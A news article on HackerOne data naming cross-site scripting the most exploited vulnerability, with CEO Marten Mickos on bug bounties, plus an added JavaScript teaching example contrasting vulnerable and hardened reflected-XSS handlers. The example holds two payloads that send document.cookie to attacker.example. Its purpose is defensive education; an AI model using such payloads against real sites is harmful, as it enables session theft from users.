Cross-site scripting (XSS) is the most commonly exploited vulnerability, according to HackerOne, currently the largest platform aimed at connecting organisations with a community of white hat hackers who can identify cyber risks, and which now has around 200,000 members.
XSS is a type of injection attack in which an attacker injects data, such as a malicious script, into content served by an otherwise trusted website. Cross-site scripting attacks happen when an untrusted source is able to inject its own code into a web application, and that malicious code is then included in dynamic content delivered to a victim’s browser, where it runs with the trust the browser places in the site.
This is an example of a vulnerability that exists because functionality routinely built into organisations’ websites can typically do more than it is intended to: insufficient validation of input, and insufficient encoding of that input when it is written back into a page, enables black hats to get websites to respond in ways that were not intended by their creators.
According to the latest data from HackerOne, XSS (CWE-79) is the most exploited vulnerability in all industries except financial services and banking, despite having been listed in the OWASP Top 10 for a number of years, and despite the availability of guidance on how to avoid it and the protections built into modern front-end web application frameworks. In financial services and banking, improper authentication (CWE-287) takes the top spot; across all other industries it is second only to XSS, accounting for 12% of all vulnerabilities.
Like all vulnerabilities, HackerOne said, XSS issues range in severity. A reflected XSS vulnerability on a site that does not authenticate users or expose any sensitive information would likely be of low severity, whereas an XSS issue on a system that exposes significant confidential information is likely to be far more severe.
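The reflected XSS pattern described above, reduced to a minimal request handler, as an added example that is not part of the HackerOne report or the Computer Weekly article. The handler names, the `?q=` parameter, the `attacker.example` host and the two payloads are constructed for illustration. The first version concatenates the query string straight into the page; the second encodes it for the HTML text and attribute contexts it lands in, and a separate helper shows the one place where encoding alone is not enough (a `href` built from untrusted input):

```javascript
// Added example: reflected XSS in a search page, vulnerable and hardened forms.
// All names, hosts and payloads below are illustrative assumptions.

// Escape the five characters that can break out of HTML text or a
// double-quoted attribute value. Safe for those two contexts only; URL,
// JavaScript and CSS contexts need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// VULNERABLE: whatever arrived in ?q= becomes markup in the victim's browser.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>\n<input name="q" value="${q}">`;
}

// HARDENED: the untrusted value is encoded before it is written into the page.
function renderSearchSafe(q) {
  const safe = escapeHtml(q);
  return `<h1>Results for ${safe}</h1>\n<input name="q" value="${safe}">`;
}

// Encoding does not stop a javascript: URL inside href, because no escapable
// character is needed to express it. Allow only absolute http(s) URLs, then
// encode the result for the attribute context.
function safeHref(url) {
  try {
    const u = new URL(url);
    if (u.protocol !== 'http:' && u.protocol !== 'https:') return '#';
    return escapeHtml(u.href);
  } catch {
    return '#'; // relative or unparsable input is rejected rather than guessed at
  }
}

// Crude but honest measure: count tag openers in the rendered page. The
// template contains exactly three (<h1>, </h1>, <input>); any extra ones came
// from the untrusted input.
function countTags(html) {
  return (html.match(/<[a-z/]/gi) || []).length;
}

// Two constructed payloads: the first breaks out of the text context, the
// second closes the attribute quote and adds an event handler.
const PAYLOADS = [
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
  '"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

function demo() {
  return PAYLOADS.map((p) => ({
    payload: p,
    tagsVulnerable: countTags(renderSearchVulnerable(p)),
    tagsSafe: countTags(renderSearchSafe(p)),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

The tag count is only a demonstration aid; in a real review, render the page through a browser or an HTML parser rather than trusting a regular expression. The framework protections mentioned above amount to `renderSearchSafe` being the default: template engines that auto-escape make the vulnerable form something a developer has to opt into explicitly.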
XSS is an example of the kind of vulnerability that many organisations are not addressing, but is extremely popular with cyber attackers because they can be found and exploited in organisations across all industry sectors.
The report, which underlines the benefits of “hacker-driven” security, also lists the other top vulnerabilities exploited by black hats: information disclosure by companies or employees, which, like improper authentication, accounts for 12% of all vulnerabilities, followed by violation of secure design principles (10%) and cross-site request forgery (CSRF), representing 8% of all vulnerabilities discovered.
According to HackerOne CEO Marten Mickos, using hackers to find vulnerabilities has several advantages over traditional penetration testing and red teaming exercises in helping organisations to take action before anything bad happens.
“When you have a dedicated [pen testing or red] team doing something, over time their creativity will become dull and they will tend to do things in the same way over and over again, and are therefore less likely to find what cyber criminals will find,” he told Computer Weekly.
“One advantage of our model is the diversity of people we can call upon, and the fact that they have no previous information about the system, so they are not ‘blinded’ by knowing too much, so they try things dedicated teams are less likely to try.
“As a result, they statistically produce better results because they come from the outside, just like the criminals, and they look more broadly and creatively because they have no preconceived notion or bias about what to look for. And while a lot of our work focuses on web property, we also hack mobile applications, APIs [application program interfaces], infrastructure software, and even chipsets.”
Another advantage, said Mickos, is that bug bounty programmes are ongoing and members of HackerOne get paid only if they find something, which means they are less likely to become complacent than pen testers, who are typically paid for carrying out testing at a single point in time, regardless of whether or not they find any vulnerabilities.
“Even though some companies deploy new code almost every day, pen testing is done only on periodic basis, and so tends to lag behind by several months,” he said.
The process is essentially the same as any bug bounty programme run by organisations aimed at encouraging white hat hackers to find cyber security vulnerabilities and work with them to mitigate those vulnerabilities in return for bug bounties.
The only real difference, said Mickos, is that organisations that use the HackerOne platform do not have to deal with hacker engagements on a one-to-one basis or handle bounty payments and tax documentation for hackers in about 150 different countries around the world.
“Our software platform automates some of the work, provides a system of record, and provides a payment mechanism, which saves time, effort and headcount. Our platform also provides a ranking system that ensures that the most appropriate white hats are tasked with specific projects and means that HackerOne is able to provide a profile of any hacker submitting a report to an organisation,” he said.
Unlike many security products, Mickos said organisations pay only when hackers find real security vulnerabilities, with the price set by market forces based on the potential impact on the organisation if an attacker were to exploit the vulnerability reported.
The severity of every vulnerability reported by a HackerOne member is scored using the Common Vulnerability Scoring System (CVSS) v3.0, and the price is set accordingly. Vulnerabilities that could have a severe effect if exploited typically command prices of $50,000 to $250,000, but such findings are fairly rare, according to Mickos; the average price is around $600.
Although HackerOne ranks the members of its platform according to their experience, skill and track record once they are on the programme, it is free for anyone over the age of 14 and from US-approved countries to join, and comes with the added benefit of support and education services.
“We are surprised at how quickly the number of members is growing without any recruitment going on, but I think we are only at the beginning, and I wouldn’t be surprised if we have a million hackers signed up within a few years because there are so many people around the world who have these skills and are looking for meaningful work to do,” said Mickos.
The ranking system means that HackerOne knows the top 1,000 contributors very well, most of them personally, he said. “Once they sign up, hackers have the opportunity to demonstrate what they can do, and as soon as they begin to stand out as high performers, we begin to track their performance, with many contributors having jobs in the mainstream cyber security industry,” he said.
“This is a faster, more productive and lower cost way of finding vulnerabilities than any other,” Mickos claims, adding that HackerOne customers include a wide range of public and private sector organisations, including the US Department of Defense, US General Services Administration, General Motors, Twitter, GitHub, Nintendo, Panasonic Avionics, Qualcomm, Square, Starbucks and Dropbox.
Commenting on the top findings of HackerOne members, Mickos said many of them are longstanding vulnerabilities that organisations are not addressing because they do not understand that the older software they are using was not designed to work in an internet-connected environment.
“It is often challenging trying to fix legacy code because in many cases the people who created the code and understand how it works are no longer at the company and nobody knows where they are,” he said.
After legacy code, one of the biggest challenges is that many vulnerabilities are not due to bugs or flaws that can simply be fixed, but to software responding to more commands than the user organisations, or even the original developers, realise. “In quality assurance and other testing, it is quite difficult to detect that software will do more than it is intended to do, creating opportunities for black hats,” said Mickos.
Another big reason hackers are able to find vulnerabilities to exploit, he said, is “common negligence” despite the increasing impact of cyber attacks.
“Many organisations are still like deer in the headlights, either not knowing what they need to do to protect themselves, or dedicating software developers to creating something new to advance the business rather than fixing security holes in existing applications. There are many perverse incentives that result in many organisations simply ignoring the problem.”
However, Mickos is optimistic. “I am certain we will fix this, but I know that it will require a very strong response from society, which will include legal mandates. The legislators will have to set mandates for corporations and government entities to take responsibility for this like they did with automobile and airline safety.”
Continuous security systems needed
Asked what areas cyber security entrepreneurs should focus on in terms of innovation, Mickos said in light of the fact businesses and individuals are spending more time engaged in activities online, there is a need for more continuous security systems that work in real time.
“Many traditional security systems tend to work only at fixed periodic intervals, so switching from point-in-time solutions to continuous security solutions or faster systems will bring benefits, because at the end of the day, security is about being a step ahead of cyber adversaries
“Other areas that are rapidly growing in importance, include threat intelligence and pooled defences through improved security information sharing. We lack systems, methods and products to do this at scale today, but history has shown that pooling defences can defeat an asymmetric threat, and I think that is what will ultimately succeed in cyber security,” he said.
Commenting on the attitude towards cyber security in the UK, Mickos said most business leaders appear to be taking their responsibilities in this regard seriously and are willing to act upon findings regarding their cyber security vulnerabilities. “They realise that is how you build strength,” he said.
Protecting citizens and small businesses
In particular, Mickos praised the work being done by the UK’s National Cyber Security Centre (NCSC) to build services to protect citizens and small businesses.
“I am very impressed at how proactive the NCSC has been in building services for email, protecting against phishing and spam, compared with many countries in Europe,” he said, referring to the NCSC’s Active Cyber Defence programme.
Another positive development, said Mickos, is the introduction of new regulatory requirements like the EU’s General Data Protection Regulation (GDPR).
“Authorities are setting guidelines for organisations, but their approach is not to put blame on organisations. There is a genuine desire to fix the problem, so we are moving in the right direction toward encouraging all organisations to take resolute action, and when they do, the tide will turn,” he said.